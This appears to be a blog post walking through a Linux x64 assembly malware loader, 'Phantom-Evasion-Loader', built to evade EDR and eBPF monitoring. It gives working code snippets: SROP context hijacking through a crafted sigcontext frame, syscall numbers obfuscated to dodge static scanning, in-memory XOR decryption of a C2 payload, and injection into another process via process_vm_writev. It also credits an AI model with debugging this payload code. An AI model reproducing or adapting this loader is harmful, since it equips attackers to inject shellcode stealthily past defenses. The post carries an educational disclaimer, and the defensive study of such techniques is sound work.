Evasion Techniques in Pure x64 Assembly: SROP and Zero-Copy Injection

Research Context

When developing offensive security tools—specifically loaders and C2 agents—the biggest hurdle is always the noise you generate. Modern EDRs, Falco eBPF monitors, and kernel-level telemetry are incredibly adept at catching standard injection techniques. If you use standard ptrace routines (like PTRACE_POKEDATA) or rely on high-level C libraries (libc), you light up monitoring dashboards like a Christmas tree.

While architecting the Phantom-Evasion-Loader, a standalone x64 Advanced Process Injector, I wanted to drastically reduce this detection surface. The solution? Dropping libc entirely and writing pure x64 Assembly. But pure Assembly isn’t enough; you need the right execution flows.

In modern malware architecture, two techniques are heavily utilized to achieve this stealth: SROP (Sigreturn Oriented Programming) and Zero-Copy Injection via process_vm_writev. Here is how they work together, and the debugging hell required to implement them.

Context Hijacking: Why SROP?

Normally, when you invoke a syscall, EDRs hook the transition points to inspect what you are doing. SROP flips this dynamic.

SROP leverages rt_sigreturn (Syscall 15). In a legitimate UNIX environment, when a signal handler finishes, sigreturn is called to restore the CPU to its exact state before the interrupt. It does this by popping an entire sigcontext structure (containing all register values) directly from the stack into the CPU registers.

By artificially crafting a fake sigcontext frame on the stack and calling rt_sigreturn, we achieve arbitrary context hijacking.

The Advantage: We hide the actual syscall we want to execute. Instead of sequentially setting up registers for a malicious call and triggering a syscall instruction that gets flagged, we just format the stack. sigreturn dumps those values directly into the CPU, instantly transitioning execution to our desired state with our desired syscall loaded into rax. It significantly minimizes ptrace noise and context hijacking footprints.

Real-World SROP Trigger in Pure Assembly

To execute SROP, we must dynamically craft the sigcontext structure. In the snippet below from the Phantom engine, rbp acts as the base pointer for our fake frame. We set our target registers, calculate the rip for the next phase (x8_syscall), pivot the stack pointer (rsp), and call Syscall 15.

Notice how the next syscall (wait4, which is 61) is also slightly obfuscated (58 + 3) to avoid static opcode scanning for obvious syscall numbers.

; --- Real-World SROP Chain Example ---
; Dynamically building the sigcontext and jumping to the next phase

x7_syscall:
    syscall                     ; Execute previous syscall in the chain

    ; Crafting the fake sigcontext frame (rbp points to our frame base)
    mov qword [rbp + 0x68], 9   ; rsi = PTRACE_SINGLESTEP (Offset 0x68)
    mov qword [rbp + 0x88], 0   ; rax = 0
    mov qword [rbp + 0x38], 0   ; r8  = 0
    
    lea rax, [rel x8_syscall]   ; Calculate RIP for the next execution phase
    mov [rbp + 0xA8], rax       ; rip = x8_syscall (Offset 0xA8 in sigcontext)
    
    mov rsp, rbp                ; Align rsp to our crafted sigcontext frame
    mov rax, 15                 ; __NR_rt_sigreturn (Syscall 15)
    syscall                     ; Trigger SROP. Context is overwritten, execution jumps!

x8_syscall:
    ; We land here with our registers fully controlled by the SROP frame
    syscall                     

    ; Obfuscated Syscall Loading
    mov rax, 58                 
    add rax, 3                  ; rax = 61 (__NR_wait4)
    mov rdi, r13                ; rdi = target PID (preserved in r13)
    xor rsi, rsi                ; wstatus = NULL
    xor rdx, rdx                ; options = 0
    xor r10, r10                ; rusage = NULL
    syscall                     ; Execute wait4

The Silent Courier: process_vm_writev (Syscall 311)

Once you have control, you need to get your payload into the target process. This is where the Zero-Copy technique comes in using process_vm_writev (Syscall 311).

Unlike standard write operations that copy data from user space to a kernel buffer, and then to the target user space, process_vm_writev writes data directly from the local process memory to the remote process memory.

The Disadvantage: It is strictly a memory write operation. It cannot allocate memory or change execution permissions on its own.
The Advantage: It completely bypasses PTRACE_POKEDATA monitoring. When chained properly, it allows you to slide your XOR-encrypted shellcode into the target space with virtually zero noise.

While Syscall 311 can’t do the job alone, when paired with an SROP chain to handle the memory permissions and execution flow, it becomes a devastatingly quiet injection method.

Real-World Payload Decryption & Zero-Copy Injection

In a practical evasion scenario, the payload should never sit in memory in plaintext. Below is the phase from the Phantom loader where the payload is decrypted in-memory (using a QWORD XOR key) immediately before being silently copied into the target process using process_vm_writev.

By structuring local_iov and remote_iov via relative addressing (rel), we keep the code Position Independent (PIC).

; =========================================================================
; PHASE 3: PAYLOAD DECRYPTION & INJECTION (The 'process_vm_writev' Way)
; =========================================================================

    ; 1. IN-MEMORY DECRYPTION
    ; Decrypt the payload within the loader's own memory space first.
    mov r12, 1632                   ; Payload size (example)
    lea r9, [rel c2_payload]
    mov r14, 0xACDAABBBA2BC1337     ; 8-Byte (QWORD) XOR Key

_decrypt_local_loop:
    mov r10, [r9]
    xor r10, r14                    ; Decrypt
    mov [r9], r10                   ; Write decrypted data back to Loader's memory
    
    add r9, 8
    sub r12, 8
    jg _decrypt_local_loop

    ; 2. ZERO-COPY INJECTION (process_vm_writev)
    
    lea rax, [rel c2_payload]
    mov [rel local_iov], rax        ; iov_base = local decrypted payload address
    mov qword [rel local_iov + 8], 1632 ; iov_len = Shellcode size

    mov rbx, qword [c2_address]     ; Remote address (previously allocated via mmap)
    mov [rel remote_iov], rbx       ; iov_base = Remote target address
    mov qword [rel remote_iov + 8], 1632 ; iov_len = Write size

    ; Fire Syscall 311!
    mov rax, 311                    ; sys_process_vm_writev
    mov rdi, r13                    ; Target PID
    lea rsi, [rel local_iov]        ; Local IOV struct address
    mov rdx, 1                      ; 1 local IOV
    lea r10, [rel remote_iov]       ; Remote IOV struct address
    mov r8, 1                       ; 1 remote IOV
    mov r9, 0                       ; Flags (0)
    syscall

Debugging Hell: Blood, Sweat, and Hidden Opcodes

Writing this logic in pure x64 Assembly is a punishing experience. You are not dealing with compiler warnings; you are dealing with segmentation faults that give you absolutely zero context.

During the debugging phase of the Phantom loader, I lost hours to what I call “invisible opcode” syndrome. Because you are manually aligning the stack for the sigcontext structure, a single misaligned byte or an unnoticeable opcode will cause the kernel to reject the sigreturn or corrupt the execution flow.

I had instances where perfectly logical code would result in a crucial register getting clobbered by an off-by-one error right before the syscall. Human eyes start to glaze over after looking at hex dumps and GDB traces for 8 hours straight.

A Quick Shoutout: I have to give credit where it’s due. When my eyes were bleeding from staring at register states and stack alignments, I fed the raw opcode traces and GDB outputs into Google’s Gemini. It acted as a flawless secondary set of eyes, instantly spotting the microscopic register clashing and opcode misalignments that were burying the payload. If you are doing pure Assembly exploitation, having an AI comb through your opcode offsets is a game-changer.

Conclusion and Open Source

Implementing SROP and Zero-Copy injections in pure, libc-free Assembly is not for the faint of heart. It requires a masochistic love for low-level architecture. However, the resulting stealth makes it highly applicable for testing the resilience of modern EBPF and EDR solutions.

You can examine the full source code, the XOR-decryption logic, and the SROP implementation on my GitHub.

Project: Phantom-Evasion-Loader (Standalone x64)

Disclaimer: This research and the associated source code are intended strictly for educational purposes, authorized security auditing, and developing better defensive heuristics.

🎓 Learning Path & Metadata

Research Context#

Context Hijacking: Why SROP?#

Real-World SROP Trigger in Pure Assembly#

The Silent Courier: process_vm_writev (Syscall 311)#

Real-World Payload Decryption & Zero-Copy Injection#

Debugging Hell: Blood, Sweat, and Hidden Opcodes#

Conclusion and Open Source#